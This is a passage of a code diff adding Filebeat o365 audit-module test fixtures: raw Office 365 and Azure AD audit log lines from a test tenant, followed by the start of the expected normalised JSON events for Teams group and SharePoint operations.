+{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"} +{"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"} +{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"} +{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json new file mode 100644 index 000000000000..372b29d8c2ca --- /dev/null +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json @@ -0,0 +1,3456 @@ +[ + { + "@timestamp": "2021-02-05T09:08:00.000Z", + "event.action": "added-group-account-to", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "audit", + "group.name": "users", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 0, + "o365.audit.CreationTime": "2021-02-05T09:08:00", + "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "o365.audit.Operation": "TeamCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 2, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:07:58.000Z", + "event.action": "added-users-to-group", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "change" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 406, + "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1", + "o365.audit.CommunicationType": "Team", + "o365.audit.CreationTime": "2021-02-05T09:07:58", + "o365.audit.Id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "o365.audit.ItemName": "users", + "o365.audit.Members": [ + { + "DisplayName": "Adrian Serrano", + "Role": 2, + "UPN": "admin@testsiem4.onmicrosoft.com" + }, + { + "DisplayName": "Eve", + "Role": 2, + "UPN": "eve@testsiem4.onmicrosoft.com" + } + ], + "o365.audit.Operation": "MemberAdded", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "admin@testsiem4.onmicrosoft.com", + "eve@testsiem4.onmicrosoft.com", + "root" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:08:13.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 1073, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd", + "o365.audit.CreationTime": "2021-02-05T09:08:13", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:12.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "FolderCreated", + "event.category": "file", + "event.code": "SharePointFileOperation", + "event.dataset": "o365.audit", + "event.id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "creation", + "file.directory": "Shared Documents", + "file.extension": "", + "file.name": "General", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 2192, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5", + "o365.audit.CreationTime": "2021-02-05T09:08:12", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "o365.audit.ItemType": "Folder", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListItemUniqueId": "81d4cd08-7ffb-45d2-a422-86a9a9335d66", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "o365.audit.Operation": "FolderCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 6, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users/", + "o365.audit.SourceFileExtension": "", + "o365.audit.SourceFileName": "General", + "o365.audit.SourceRelativeUrl": "Shared Documents", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "url.original": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:07:57.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 3234, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:57", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "Everyone except external users", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 4046, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 4838, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": 